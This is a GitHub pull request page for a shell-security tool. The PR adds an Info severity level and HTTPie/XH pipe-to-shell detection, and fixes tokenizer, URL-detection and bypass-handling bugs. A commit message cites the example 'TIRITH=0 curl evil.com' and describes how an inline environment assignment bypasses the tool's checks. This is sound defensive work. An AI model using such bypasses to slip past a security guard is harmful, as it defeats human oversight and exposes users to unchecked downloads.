Skip to content

Add Info severity level and HTTPie/XH pipe-to-shell detection#43

Merged
sheeki03 merged 14 commits intomainfrom
feat/part1-info-severity-httpie
Feb 24, 2026
Merged

Add Info severity level and HTTPie/XH pipe-to-shell detection#43
sheeki03 merged 14 commits intomainfrom
feat/part1-info-severity-httpie

Conversation

@sheeki03
Copy link
Owner

@sheeki03 sheeki03 commented Feb 24, 2026
edited by macroscopeapp bot
Loading

Summary

  • Add Info severity level for low-noise informational findings
  • Add HTTPie (http/https) and XH as monitored pipe-to-shell downloaders
  • Fix audit silent failures, output error handling
  • Bug fixes for schemeless URL detection, tokenizer, doctor, shell hooks

Test plan

  • All existing tests pass

🤖 Generated with Claude Code

Note

Emit INFO output for allowed verdicts and default max severity to Severity::Info in cli::score::run

Set the action label to INFO when verdict.action is Allow in human and no-color output, and default max severity to Severity::Info in cli::score::run for empty findings.

📍Where to Start

Start with output::write_human in output.rs, then review cli::score::run in score.rs.

Macroscope summarized fbfa5d9.

sheeki03 and others added 8 commits February 18, 2026 11:49
@sheeki03
Fix audit silent failures, output error handling, and Info severity d…
0bfcd6f 
…isplay

- Report audit log errors instead of silently swallowing them
- Handle CLI output write errors in check/run/score
- Display Info-severity findings in human output (was silently dropped)
- Use Info as default severity fallback instead of Low
@sheeki03 @claude
Fix tokenizer to skip leading env assignments for command resolution
0f55f0a 
push_segment() incorrectly treated VAR=VALUE as the command token. Now
skips leading environment variable assignments to find the real command.
Adds pub is_env_assignment() helper for use by engine bypass detection.

Fixes: TIRITH=0 curl evil.com now correctly identifies curl as command.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
@sheeki03 @claude
Fix schemeless URL false positives on output filenames
51d11ca 
Add command-aware output-flag skipping for curl (-o/--output) and wget
(-O/-OFILE/--output-document). Extract URLs from command+args instead
of raw segment text to avoid matching URLs in env-prefix values.

Add conservative non-TLD file extensions (.png, .jpg, .mp4, etc.) to
schemeless host exclusion list. Fixes issue #33.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
@sheeki03 @claude
Add --interactive flag to shell hooks for correct bypass policy
61762f8 
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
@sheeki03 @claude
Add inline bypass detection and self-invocation guard to engine
cf76ae3 
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
@sheeki03 @claude
Fix doctor to check fish conf.d and all profile candidates
8e27ace 
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
@sheeki03 @claude
Format bug fix code
51b8fc7 
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
@sheeki03 @claude
Fix schemeless detection false-negative for TLD-overlap domains with …
a2b9b9d 
…paths

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
macroscopeapp[bot]
macroscopeapp bot reviewed Feb 24, 2026
View reviewed changes
sheeki03 and others added 3 commits February 24, 2026 22:39
@sheeki03
Fix CI: cargo fmt, clippy lints, add RUSTSEC-2026-0009 ignore
2d8250a 
- Run cargo fmt --all
- Fix clippy lints: collapsible else-if in check.rs, uninlined_format_args
- Add .cargo/audit.toml ignoring RUSTSEC-2026-0009 (time crate DoS,
  not exploitable in our usage, fix requires Rust 1.88)
- Add same ignore to deny.toml
@sheeki03
Merge remote-tracking branch 'origin/main' into feat/part1-info-sever…
75ddd43 
…ity-httpie
@sheeki03 @claude
Fix review findings and merge main
03982ba 
- Merge origin/main (glibc build fix)
- Fix single & segment boundary in split_raw_words (security)
- Use exact match == TIRITH=0 (prevents false bypass)
- Skip flags in resolve_command_wrapper
- Remove dead code in is_tirith_command

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
macroscopeapp[bot]
macroscopeapp bot reviewed Feb 24, 2026
View reviewed changes
@sheeki03 @claude
Fix inline bypass: handle quoted values and require command word
311b50d 
- TIRITH='0' and TIRITH="0" are now recognized as bypass assignments
  (split_raw_words preserves quotes, so literal == "TIRITH=0" missed these)
- Require a real command word after TIRITH=0 in the same segment — bare
  TIRITH=0 or TIRITH=0; with no command is no longer treated as bypass
- Same fixes applied to the env wrapper path
- Add is_tirith_bypass_assignment() + strip_surrounding_quotes() helpers
- Add 14 unit tests covering quoted values, no-command rejection, env paths

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
macroscopeapp[bot]
macroscopeapp bot reviewed Feb 24, 2026
View reviewed changes
sheeki03 and others added 2 commits February 25, 2026 00:31
@sheeki03 @claude
Merge main: resolve conflicts in engine.rs and tokenize.rs
7979e4f 
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
@sheeki03 @claude
Merge origin/main into feat/part1-info-severity-httpie
fbfa5d9 
Resolve deny.toml conflict by taking main's version.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
@sheeki03 sheeki03 merged commit b587439 into main Feb 24, 2026
9 checks passed
@sheeki03 sheeki03 deleted the feat/part1-info-severity-httpie branch February 24, 2026 21:58
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@macroscopeapp macroscopeapp[bot] macroscopeapp[bot] left review comments

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@sheeki03